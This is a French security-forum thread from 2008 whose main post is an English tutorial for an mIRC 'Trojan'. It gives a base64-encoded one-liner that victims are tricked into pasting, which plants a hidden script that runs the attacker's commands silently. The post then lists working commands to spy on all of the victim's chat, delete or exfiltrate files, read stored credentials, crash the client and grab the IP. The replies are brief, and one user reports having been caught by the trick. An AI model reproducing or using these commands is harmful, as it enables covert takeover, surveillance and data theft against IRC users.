Trojan IRC

Moderator: Mod

Trojan IRC

Postby Korigan » Thu Jan 03, 2008 3:24 pm

//Powered By DarkFel 8)
1) Infect the victim

[b:195249bcbd]The Trojan can be activated by the victim[/b:195249bcbd] when he writes the next command:



//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc |
msg YOURNICK i love you



YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
the ' | msg YOURNICK I love you ' part.



This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on
^*:text:ins*:?:{ . $+ $2- | haltdef }

The haltdef will block your messages to the victim beginning with 'ins'. With this the user can???t see your commands, so he
wont have a clue who is controlling his mIRC.

Example:

/msg victim ins msg #channel hi

This will let the victim message #channel the 'hi' message, but the victim will NOT see it, all others in the channel will see.
And the victim will not see your message 'ins msg #channel hi' because it will be blocked by 'haltdef'. Nice isn???t it? J



When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause
him an excess flood if he is on too much 'popular' channels (channel with much activity). For adding the spy part (it will send
you all his activity, messages received, message sent and commands executed) execute the next commands:



2) Spy the victim:

/msg victim ins write -c myscript.mrc

/msg victim ins unload -rs myscript.mrc

/msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }

/msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ >
$1- }

/msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+
>,[COMMAND]) $1- }

/msg victim ins load -rs myscript.mrc



Once done that, you???ll receive the msgs immediately. You can let the spy function stop by typing the next command:



/msg victim ins unload -rs myscript.mrc



Note: victim = the nick of the victim who has executed that command, and who has the Trojan.



3) Make other remote files (.mrc)

You can make remote files yourself and add usefull functions in it.

/msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick

/msg victim ins .load ???rs YOURSCRIPTNAMEt.mrc



4) Use of the Trojan:

Well this is limited, but this is the main basic: you can make commands yourself, I???ll try to make more advanced commands
later J



REMOVE FILE :

/msg victim ins remove C:\Textfile.txt



OPEN SITE:

/msg victim ins url www.site.com



JOIN CHANNEL:

/msg victim ins join #channel



PART CHANNEL:

/msg victim ins part #channel



QUERY USER:

/msg victim ins query user



MSG USER:

/msg victim ins msg user



INVITE USER:

/msg victim ins invite user #channel



BAN USER:

/msg victim ins ban #channel user



KICK USER:

/msg victim ins kick #channel user



IGNORE USER:

/msg victim ins ignore *!*@host.com



UNIGNORE USER:

/msg victim ins unignore *!*@host.com



CHANGE NICK:

/msg victim ins nick thenickyouwant



OP USER:

/msg victim ins mode #channel +o user



VOICE USER:

/msg victim ins mode #channel +v user



CHANGE TOPIC:

/msg victim ins topic #channel text



RECEIVE FILE:

/msg victim ins dcc send user file

or

/msg victim ins dcc send user C:\something.sth



EDIT TEXT:

/msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit

(-l1 --> first line)



READ A PIECE OF FILE (LIKE PERFORM):

following commands must be executed after eachother:

/msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }

/msg victim ins .load -rs mab

/msg victim ins abcd123



SEARCH HARD DISK FOR A FILE:

/msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }

/msg victim ins .load -rs MAB1

/msg victim ins MAB1



LET HIS mIRC CRASH:

/msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }

/msg victim ins .load -rs MAB2

/msg victim ins MAB2



SCAN HIS HARD DISK AND SAVE IT AS .txt:

//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)



Note: Probably you want this file, well you do this:

/msg victim ins dcc send YOURNICK C:\M_A_B.txt

** Important note **

The victim will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:

/msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) |
.load -rs MyNewScript.mrc



FIND THE VICTIMs IP WHEN HE USES A MASK:

/msg victim ins //msg YOURNICK $ip



FIND THE VICTIMs HOST WHEN HE USES A MASK:

/msg victim ins //msg YOURNICK $host



FIND THE VICTIMs OS:

/msg victim ins //msg YOURNICK $os



FIND OUT ON WHICH SERVER THE VICTIM IS LOCATED:

/msg victim ins //msg YOURNICK $server



FIND OUT WHAT THE REAL TIME ON THE VICTIMs PC IS:

/msg victim ins //msg YOURNICK $time



FIND OUT WHAT THE REAL DATE ON THE VICTIMs PC IS:

/msg victim ins //msg YOURNICK $date



FIND OUT OF THE VICTIM IS AWAY

/msg victim ins //msg YOURNICK $away



FIND OUT THE IP OF THE SERVER THE VICTIM IS ON:

/msg victim ins //msg YOURNICK $serverIP



FIND OUT ON WHAT URLs THE VICTIM IS ON AT THE MOMENT:

/msg victim ins //msg YOURNICK $url



FIND OUT WHAT THE REAL mIRC VERSION THE VICTIM HAS:

/msg victim ins //msg YOURNICK $victim



TURN THE AUTO JOIN ON INVITE ON (or OFF)

/msg victim ins ajinvite on



LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:

/msg victim ins amsg <the message you want him to say on all channels>



CHANGE THE VICTIMs ALTERNATIVE NICK:

/msg victim ins anick <nickname>



CHANGE THE VICTIMs BACKGROUND PICTURE:

/msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]

with

-a = active window

-m = main mIRC window

-s = status window

-g = finger window

-d = single message window



-e = set as default



-cfnrtp = center, fill, normal, stretch, tile, photo



-l = toolbar

-u = toolbar buttons

-h = switchbar



-x = no background picture



LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:

/msg victim ins channel #CHANNELNAME

Note: the victim must be on #CHANNELNAME



CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:

/msg victim ins clearall [-snqmtgu]

s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.



LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:

/msg victim ins clipboard <the text you want to be clipboarded>



CLOSE THE OPEN QUERIES OF THE VICTIM:

/msg victim ins close



LET THE VICTIM QUIT mIRC:

/msg victim ins quit <the quit message you want>



LET THE VICTIM DISCONNECT FROM SERVER:

/msg victim ins disconnect



LET THE VICTIM CHANGE SERVER:

/msg victim ins server the.server.you.want



LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:

/msg victim ins server -m

/msg victim ins server the.server.you.want



LET THE VICTIM GIVE YOU FLAGS (if he is able to):

/msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag

Note:

|TheBot| = the bot who can give flags

Chanlev = can be different, sometimes it is also, "adduser"

flag = the flag you want

YOURNICK = your nick



CHANGE THE VICTIMs FONT AND FONT SIZE:

/msg victim ins font -asgbd <fontsize> <fontname>



CHANGE THE VICTIMs FULL NAME:

/msg victim ins fullname <name>



LET THE VICTIM REJOIN A CHANNEL:

/msg victim ins hop #CHANNEL



MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:

/msg victim ins mkdir <dirname>



NOTE:

victim = nick of the victim

user = your nick
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby sarrek » Thu Jan 03, 2008 4:19 pm

je vais plus jamais sur mirc xD^^
User avatar
sarrek
Projets
 
Posts: 108
Joined: Sat Nov 03, 2007 2:27 am

Postby DarkFel » Fri Jan 04, 2008 1:10 pm

ben voyons 8) powered by DarkFel mdr !
DarkFel
Projets
 
Posts: 78
Joined: Tue Dec 11, 2007 7:21 pm

xhunter

Postby xhunter » Sun May 18, 2008 10:41 am

lol Korigan de ou t as eu ce tuto ?

mybe sur nettools ont trouve ca
mais c est old ca !
User avatar
xhunter
Projets
 
Posts: 44
Joined: Fri Dec 28, 2007 9:25 pm

Postby Ness » Mon May 19, 2008 4:39 am

old ? ... maybe.
But Work! don't worry..
User avatar
Ness
Projets
 
Posts: 61
Joined: Sun Apr 27, 2008 12:44 am

Postby Korigan » Mon May 19, 2008 12:15 pm

Ce n'est pas moi, c'est Darkfel :P

Mais oui, il fonctionne et disons que c'était pour sensibiliser un peu à l'irc et parler d'un concept un peu différents que les autres exploit appréhendé qui tournent pas mal autour des forums.

Donc là nous voyons une façon d'exploiter un autre protocole. Ce serait bien de faire la même chose pour ftp,ssh, snmp,etc... d'ailleur.

@++ Korigan
User avatar
Korigan
Site Admin
 
Posts: 1781
Joined: Tue May 29, 2007 6:57 pm

Postby Skorm » Mon May 19, 2008 5:41 pm

Bien parler Ness ! :D
User avatar
Skorm
 
Posts: 792
Joined: Fri Feb 22, 2008 12:01 pm
Location: 127.0.0.1

Postby Romain » Sun May 25, 2008 1:47 pm

:( je me suis fait avoir y a lomptemps avec sa -_- ce c$$ m'avais dit que c'etait pour pas avoir des trojans mirc
j'avais grave les boules :x
Romain
Projets
 
Posts: 1
Joined: Fri Jan 04, 2008 5:19 pm

Postby Guilou » Sun May 25, 2008 5:04 pm

Ca serait cool d'arrêter de confondre mIRC et IRC...
Guilou
Projets
 
Posts: 7
Joined: Tue May 20, 2008 7:08 pm


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 1 guest

cron